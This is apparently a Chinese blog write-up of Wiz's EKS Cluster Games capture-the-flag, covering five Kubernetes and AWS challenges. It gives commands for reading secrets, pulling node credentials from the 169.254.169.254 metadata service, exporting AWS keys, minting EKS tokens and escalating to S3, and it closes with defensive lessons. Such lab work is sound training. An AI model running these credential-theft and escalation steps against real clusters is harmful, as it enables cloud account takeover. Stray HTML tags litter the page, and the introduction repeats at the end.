从EKS CLUSTER GAMES看云原生安全实战<\/h1>

前言<\/h2>
本文基于WIZ举办的EKS Cluster Games云原生安全挑战赛，详细解析了5个不同难度的Kubernetes安全挑战。这些挑战模拟了真实世界中的云原生安全场景，涵盖了从基础权限提升到AWS账户横向移动的完整攻击链。<\/p>

挑战一：Secret Seeker<\/h2>

目标<\/strong>：列出集群中的所有secrets并找到flag<\/p>

给定权限<\/strong>：<\/p>

{
<\/span><\/span>    "secrets"<\/span>: [
<\/span><\/span>        "get"<\/span>,
<\/span><\/span>        "list"<\/span>
<\/span><\/span>    ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>：<\/p>

使用kubectl get secrets<\/code>列出所有secret<\/li>
发现名为log-rotate<\/code>的secret包含flag<\/li>
解码base64格式的flag<\/li>
<\/ol>
关键命令<\/strong>：<\/p>
kubectl get secrets log-rotate -o yaml
<\/span><\/span>echo "d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ=="<\/span> | base64 -d
<\/span><\/span><\/code><\/pre>安全要点<\/strong>：<\/p>

Kubernetes Secret使用Base64编码而非加密，本质上不安全<\/li>
过度授权(over-privileged)的secret访问权限会导致信息泄露<\/li>
敏感信息不应仅依赖Secret机制保护<\/li>
<\/ul>
挑战二：Registry Hunt<\/h2>
目标<\/strong>：通过检查容器注册表获取flag<\/p>
给定权限<\/strong>：<\/p>
{
<\/span><\/span>    "secrets"<\/span>: [
<\/span><\/span>        "get"<\/span>
<\/span><\/span>    ],
<\/span><\/span>    "pods"<\/span>: [
<\/span><\/span>        "list"<\/span>,
<\/span><\/span>        "get"<\/span>
<\/span><\/span>    ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>：<\/p>

检查pod配置，发现imagePullSecrets<\/code><\/li>
获取并解码.dockerconfigjson<\/code>中的认证信息<\/li>
使用crane工具登录Docker registry<\/li>
检查镜像配置获取flag<\/li>
<\/ol>
关键命令<\/strong>：<\/p>
kubectl get pods -o yaml
<\/span><\/span>kubectl get secret registry-pull-secrets-780bab1d --namespace=<\/span>challenge2 -o json
<\/span><\/span>crane auth login index.docker.io -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
<\/span><\/span>crane config eksclustergames\/base_ext_image:latest
<\/span><\/span><\/code><\/pre>安全要点<\/strong>：<\/p>

imagePullSecrets可能泄露容器注册表凭据<\/li>
容器镜像历史可能包含敏感信息(如flag)<\/li>
真实案例：阿里云和IBM云曾出现类似跨租户未授权访问漏洞<\/li>
<\/ul>
挑战三：Image Inquisition<\/h2>
目标<\/strong>：通过检查ECR仓库中的镜像层获取flag<\/p>
给定权限<\/strong>：<\/p>
{
<\/span><\/span>    "pods"<\/span>: [
<\/span><\/span>        "list"<\/span>,
<\/span><\/span>        "get"<\/span>
<\/span><\/span>    ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>：<\/p>

检查pod信息获取ECR仓库地址<\/li>
通过元数据服务获取AWS临时凭证<\/li>
使用AWS CLI获取ECR登录密码<\/li>
使用crane检查镜像配置获取flag<\/li>
<\/ol>
关键命令<\/strong>：<\/p>
curl http:\/\/169.254.169.254\/latest\/meta-data\/iam\/security-credentials\/eks-challenge-cluster-nodegroup-NodeInstanceRole
<\/span><\/span>export AWS_ACCESS_KEY_ID=<\/span>ASIA2AVYNEVMQNCHP4P5
<\/span><\/span>export AWS_SECRET_ACCESS_KEY=<\/span>a+2FDCofUYQrvZUHKdPUMP4RxMNmdjYpqwC1En6M
<\/span><\/span>export AWS_SESSION_TOKEN=<\/span>FwoGZXIvYXdzEIz...
<\/span><\/span>aws ecr get-login-password | crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com -u AWS --password-stdin
<\/span><\/span>crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com\/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
<\/span><\/span><\/code><\/pre>安全要点<\/strong>：<\/p>

云服务元数据服务(IMDS)可能泄露高权限凭证<\/li>
容器镜像构建历史可能暴露敏感信息<\/li>
各云厂商元数据服务地址：

AWS: http:\/\/169.254.169.254<\/li>
Google Cloud: http:\/\/metadata.google.internal<\/li>
Azure: http:\/\/169.254.169.254<\/li>
Alibaba Cloud: http:\/\/100.100.100.200<\/li>
Tencent Cloud: http:\/\/metadata.tencentyun.com<\/li>
<\/ul>
<\/li>
<\/ul>
挑战四：Pod Break<\/h2>
目标<\/strong>：从受限服务账户提升到节点服务账户权限<\/p>
解题步骤<\/strong>：<\/p>

获取当前AWS身份信息<\/li>
使用AWS CLI获取EKS集群token<\/li>
利用token列举集群权限和资源<\/li>
获取secrets中的flag<\/li>
<\/ol>
关键命令<\/strong>：<\/p>
aws sts get-caller-identity
<\/span><\/span>aws eks get-token --cluster-name eks-challenge-cluster
<\/span><\/span>kubectl auth can-i --list --token=<\/span>"k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20v..."<\/span>
<\/span><\/span>kubectl get secrets -o yaml --token=<\/span>"k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20v..."<\/span>
<\/span><\/span><\/code><\/pre>安全要点<\/strong>：<\/p>

EKS节点服务账户通常具有较高权限<\/li>
获取节点角色凭证后可横向移动至集群管理平面<\/li>
现实中此类配置错误非常常见<\/li>
<\/ul>
挑战五：Container Secrets Infrastructure<\/h2>
目标<\/strong>：从EKS节点权限提升到AWS账户权限，获取S3中的flag<\/p>
IAM策略<\/strong>：<\/p>
{
<\/span><\/span>    "Policy"<\/span>: {
<\/span><\/span>        "Statement"<\/span>: [
<\/span><\/span>            {
<\/span><\/span>                "Action"<\/span>: [
<\/span><\/span>                    "s3:GetObject"<\/span>,
<\/span><\/span>                    "s3:ListBucket"<\/span>
<\/span><\/span>                ],
<\/span><\/span>                "Effect"<\/span>: "Allow"<\/span>,
<\/span><\/span>                "Resource"<\/span>: [
<\/span><\/span>                    "arn:aws:s3:::challenge-flag-bucket-3ff1ae2"<\/span>,
<\/span><\/span>                    "arn:aws:s3:::challenge-flag-bucket-3ff1ae2\/flag"<\/span>
<\/span><\/span>                ]
<\/span><\/span>            }
<\/span><\/span>        ],
<\/span><\/span>        "Version"<\/span>: "2012-10-17"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>：<\/p>

创建带有特定audience(sts.amazonaws.com)的service account token<\/li>
使用token获取AWS临时凭证<\/li>
访问S3存储桶获取flag<\/li>
<\/ol>
关键命令<\/strong>：<\/p>
kubectl create token debug-sa --audience sts.amazonaws.com
<\/span><\/span>export AWS_ACCESS_KEY_ID=<\/span>ASIA2AVYNEVM4Z35S2XF
<\/span><\/span>export AWS_SECRET_ACCESS_KEY=<\/span>BmwwpthMz2ivzM1yCkD0InVyUHoxYK09ojkOP7VD
<\/span><\/span>export AWS_SESSION_TOKEN=<\/span>IQoJb3JpZ2luX2VjEIj...
<\/span><\/span>aws s3 cp s3:\/\/challenge-flag-bucket-3ff1ae2\/flag .\/flag
<\/span><\/span><\/code><\/pre>安全要点<\/strong>：<\/p>

OIDC(OpenID Connect)可用于Kubernetes与AWS的联合身份验证<\/li>
通过创建特定audience的token可实现Kubernetes到AWS的权限提升<\/li>
最小权限原则在云原生环境中尤为重要<\/li>
<\/ul>
总结<\/h2>
这五个挑战展示了云原生环境中完整的安全攻击链：<\/p>

从容器内低权限开始<\/li>
利用配置错误和过度授权提升权限<\/li>
通过元数据服务获取云凭据<\/li>
横向移动至集群管理平面<\/li>
最终通过联合身份验证接管云账户<\/li>
<\/ol>
关键防御措施<\/strong>：<\/p>

实施最小权限原则<\/li>
保护元数据服务访问<\/li>
定期审计RBAC和IAM策略<\/li>
监控异常token创建和API调用<\/li>
避免在镜像历史和构建过程中暴露敏感信息<\/li>
<\/ul>
这些挑战基于真实世界的安全漏洞，理解这些攻击技术对于构建安全的云原生环境至关重要。<\/p>

从EKS CLUSTER GAMES看云原生安全实战<\/h1>

前言<\/h2> 本文基于WIZ举办的EKS Cluster Games云原生安全挑战赛，详细解析了5个不同难度的Kubernetes安全挑战。这些挑战模拟了真实世界中的云原生安全场景，涵盖了从基础权限提升到AWS账户横向移动的完整攻击链。<\/p>

前言<\/h2>
本文基于WIZ举办的EKS Cluster Games云原生安全挑战赛，详细解析了5个不同难度的Kubernetes安全挑战。这些挑战模拟了真实世界中的云原生安全场景，涵盖了从基础权限提升到AWS账户横向移动的完整攻击链。<\/p>